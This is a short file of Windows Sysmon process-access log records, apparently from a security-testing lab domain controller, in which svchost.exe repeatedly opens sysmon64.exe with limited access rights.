{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1351,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
